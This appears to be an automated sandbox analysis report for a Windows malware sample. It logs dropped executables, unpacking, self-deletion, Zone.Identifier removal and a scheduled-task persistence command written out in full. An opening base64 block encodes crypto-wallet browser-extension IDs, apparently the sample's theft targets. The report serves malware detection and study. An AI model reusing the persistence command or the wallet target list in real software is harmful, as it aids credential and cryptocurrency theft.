ZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4044:120:WilError_01
Source: C:\Windows\SysWOW64\fontview.exe	Mutant created: \Sessions\1\BaseNamedObjects\Random name
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_01
Source: C:\Windows\SysWOW64\fontview.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}

Source: Library.exe.25.dr, ue06e.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Library.exe.25.dr, ue03f.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\226F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\226F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2560.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2560.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\dllhost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\System32\dllhost.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook

Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: aw9Ynwqd1x.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: fontview.exe, 00000013.00000003.386062019.0000000005086000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.386284855.00000000051A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WINMMBASE.pdbUGP source: fontview.exe, 00000013.00000003.421038965.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: fontview.exe, 00000013.00000003.395722778.0000000005088000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcrt.pdb source: fontview.exe, 00000013.00000003.389771646.0000000005150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdb source: fontview.exe, 00000013.00000003.391168128.0000000005150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: fontview.exe, 00000013.00000003.385093474.00000000053B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.383912006.0000000005084000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shcore.pdb source: fontview.exe, 00000013.00000003.406207334.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406327938.0000000005110000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000018.00000003.490751661.000002275D660000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wwin32u.pdbGCTL source: fontview.exe, 00000013.00000003.401619984.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdbUGP source: fontview.exe, 00000013.00000003.391810335.0000000005000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\zetoxu68-vepibayawu-woxixawenobaju_93\fucabopiso_d.pdbp source: aw9Ynwqd1x.exe, 00000000.00000000.246785291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dbjigst, 0000000D.00000000.336022819.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: _C:\fepovilorefego5.pdb source: explorer.exe, 00000001.00000003.337271065.00000000082B0000.00000004.00000001.00020000.00000000.sdmp, 336E.exe, 0000000E.00000000.336659529.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: wgdi32.pdb source: fontview.exe, 00000013.00000003.392076418.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: setupapi.pdbUGP source: fontview.exe, 00000013.00000003.423766732.00000000059F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.421577482.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdb source: fontview.exe, 00000013.00000003.419420089.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: advapi32.pdb source: fontview.exe, 00000013.00000003.388608530.0000000005080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wsspicli.pdb source: fontview.exe, 00000013.00000003.391685317.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\zetoxu68-vepibayawu-woxixawenobaju_93\fucabopiso_d.pdb source: aw9Ynwqd1x.exe, 00000000.00000000.246785291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dbjigst, 0000000D.00000000.336022819.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: cfgmgr32.pdbUGP source: fontview.exe, 00000013.00000003.414369645.0000000005000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\nujiwucosunes\vezik.pdb source: explorer.exe, 00000001.00000003.342443196.000000000B700000.00000004.00000010.00020000.00000000.sdmp, 2560.exe, 0000000F.00000002.356859286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2560.exe, 0000000F.00000000.341351275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2560.exe, 00000011.00000000.353377908.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: shell32.pdb source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 2560.exe, 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdbUGP source: fontview.exe, 00000013.00000003.391168128.0000000005150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Timayiko\Kodale\hiwer\Fami\Somayofa wiho.pdb source: 226F.exe, 00000010.00000002.479266806.000000000114C000.00000002.00000001.01000000.0000000B.sdmp, 226F.exe, 00000010.00000000.352256641.000000000114C000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: msvcp_win.pdb source: fontview.exe, 00000013.00000003.395588310.0000000005080000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.445193713.00000000053B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: psapi.pdbUGP source: fontview.exe, 00000013.00000003.421493166.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wgdi32.pdbUGP source: fontview.exe, 00000013.00000003.392076418.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wimm32.pdb source: fontview.exe, 00000013.00000003.419485427.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: fontview.exe, 00000013.00000003.386704960.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shlwapi.pdb source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mpr.pdb source: fontview.exe, 00000013.00000003.425517005.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wwin32u.pdb source: fontview.exe, 00000013.00000003.401619984.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wsspicli.pdbGCTL source: fontview.exe, 00000013.00000003.391685317.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shlwapi.pdbUGP source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: setupapi.pdb source: fontview.exe, 00000013.00000003.423766732.00000000059F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.421577482.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 3C:\nujiwucosunes\vezik.pdb` source: explorer.exe, 00000001.00000003.342443196.000000000B700000.00000004.00000010.00020000.00000000.sdmp, 2560.exe, 0000000F.00000002.356859286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2560.exe, 0000000F.00000000.341351275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2560.exe, 00000011.00000000.353377908.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 2560.exe, 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: combase.pdbUGP source: fontview.exe, 00000013.00000003.401758325.00000000055B3000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.403198719.0000000005820000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: fontview.exe, 00000013.00000003.395722778.0000000005088000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: fontview.exe, 00000013.00000003.386704960.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cryptbase.pdbUGP source: fontview.exe, 00000013.00000003.391748694.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wuser32.pdbUGP source: fontview.exe, 00000013.00000003.400623587.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.400263237.0000000005084000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shell32.pdbUGP source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wimm32.pdbUGP source: fontview.exe, 00000013.00000003.419485427.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdbGCTL source: fontview.exe, 00000013.00000003.419420089.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WINMMBASE.pdb source: fontview.exe, 00000013.00000003.421038965.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: comdlg32.pdb source: fontview.exe, 00000013.00000003.405354581.000000000508E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.405703009.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wgdi32full.pdbUGP source: fontview.exe, 00000013.00000003.392165110.0000000005102000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.393323768.000000000542C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: profapi.pdb source: fontview.exe, 00000013.00000003.419057448.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ws2_32.pdb source: fontview.exe, 00000013.00000003.421384076.0000000005000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: comdlg32.pdbUGP source: fontview.exe, 00000013.00000003.405354581.000000000508E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.405703009.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wgdi32full.pdb source: fontview.exe, 00000013.00000003.392165110.0000000005102000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.393323768.000000000542C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shcore.pdbUGP source: fontview.exe, 00000013.00000003.406207334.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406327938.0000000005110000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000018.00000003.490751661.000002275D660000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mpr.pdbUGP source: fontview.exe, 00000013.00000003.425517005.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: sechost.pdb source: fontview.exe, 00000013.00000003.390338279.0000000005000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: fontview.exe, 00000013.00000003.385093474.00000000053B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.383912006.0000000005084000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\fepovilorefego5.pdb source: explorer.exe, 00000001.00000003.337271065.00000000082B0000.00000004.00000001.00020000.00000000.sdmp, 336E.exe, 0000000E.00000000.336659529.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: ole32.pdbUGP source: fontview.exe, 00000013.00000003.420283986.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.419630627.000000000508A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdbUGP source: fontview.exe, 00000013.00000003.419219769.0000000005000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdb source: fontview.exe, 00000013.00000003.419219769.0000000005000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wmswsock.pdb source: fontview.exe, 00000013.00000003.425560872.0000000005000000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.446231172.0000000004F16000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ole32.pdb source: fontview.exe, 00000013.00000003.420283986.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.419630627.000000000508A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Windows.Storage.pdbUGP source: fontview.exe, 00000013.00000003.416675694.0000000005B80000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.414492613.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Kernel.Appcore.pdbUGP source: fontview.exe, 00000013.00000003.418853263.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbGCTL source: fontview.exe, 00000013.00000003.386062019.0000000005086000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.386284855.00000000051A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: sechost.pdbUGP source: fontview.exe, 00000013.00000003.390338279.0000000005000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: comctl32.pdbUGP source: fontview.exe, 00000013.00000003.407879570.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406570415.00000000055BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: fontview.exe, 00000013.00000003.418853263.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: psapi.pdb source: fontview.exe, 00000013.00000003.421493166.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msvcp_win.pdbUGP source: fontview.exe, 00000013.00000003.395588310.0000000005080000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.445193713.00000000053B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: advapi32.pdbUGP source: fontview.exe, 00000013.00000003.388608530.0000000005080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cryptbase.pdb source: fontview.exe, 00000013.00000003.391748694.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdb source: fontview.exe, 00000013.00000003.414369645.0000000005000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdb source: fontview.exe, 00000013.00000003.391810335.0000000005000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdbUGP source: fontview.exe, 00000013.00000003.421125892.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.421276873.0000000005120000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: combase.pdb source: fontview.exe, 00000013.00000003.401758325.00000000055B3000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.403198719.0000000005820000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Windows.Storage.pdb source: fontview.exe, 00000013.00000003.416675694.0000000005B80000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.414492613.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
Source:	Binary string: profapi.pdbUGP source: fontview.exe, 00000013.00000003.419057448.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wmswsock.pdbUGP source: fontview.exe, 00000013.00000003.425560872.0000000005000000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.446231172.0000000004F16000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdb source: fontview.exe, 00000013.00000003.421125892.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.421276873.0000000005120000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wuser32.pdb source: fontview.exe, 00000013.00000003.400623587.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.400263237.0000000005084000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32.pdb source: fontview.exe, 00000013.00000003.407879570.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406570415.00000000055BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws2_32.pdbUGP source: fontview.exe, 00000013.00000003.421384076.0000000005000000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\336E.exe	Unpacked PE file: 14.2.336E.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\2560.exe	Unpacked PE file: 17.2.2560.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Unpacked PE file: 0.2.aw9Ynwqd1x.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\dbjigst	Unpacked PE file: 13.2.dbjigst.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Unpacked PE file: 14.2.336E.exe.400000.0.unpack .text:ER;.data:W;.huxuho:R;.gini:R;.vab:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\2560.exe	Unpacked PE file: 17.2.2560.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

.NET source code contains potential unpacker

Source: Library.exe.25.dr, ue061.cs

.Net Code: ? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_0040CE51 push ecx; ret
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_0040CE51 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_004363BD push esi; ret
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_004139F8 push ecx; ret

Source: 336E.exe.1.dr	Static PE information: section name: .huxuho
Source: 336E.exe.1.dr	Static PE information: section name: .gini
Source: 336E.exe.1.dr	Static PE information: section name: .vab
Source: svcupdater.exe.14.dr	Static PE information: section name: .huxuho
Source: svcupdater.exe.14.dr	Static PE information: section name: .gini
Source: svcupdater.exe.14.dr	Static PE information: section name: .vab
Source: 5898187.dll.16.dr	Static PE information: section name: .00cfg

Source: initial sample	Static PE information: section name: .text entropy: 7.880058673023214
Source: initial sample	Static PE information: section name: .text entropy: 7.648160210316085

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\dbjigst

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\336E.exe	File created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\336E.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\226F.exe	Jump to dropped file
Source: C:\Windows\System32\dllhost.exe	File created: C:\Users\user\AppData\Local\Temp\Library.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\dbjigst	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\2560.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\fontview.exe	File created: C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\226F.exe	File created: C:\Users\user\AppData\Local\Temp\5898187.dll	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\336E.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\aw9ynwqd1x.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\dbjigst:Zone.Identifier read attributes | delete

Source: C:\Users\user\AppData\Local\Temp\336E.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2560.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2560.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2560.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2560.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX
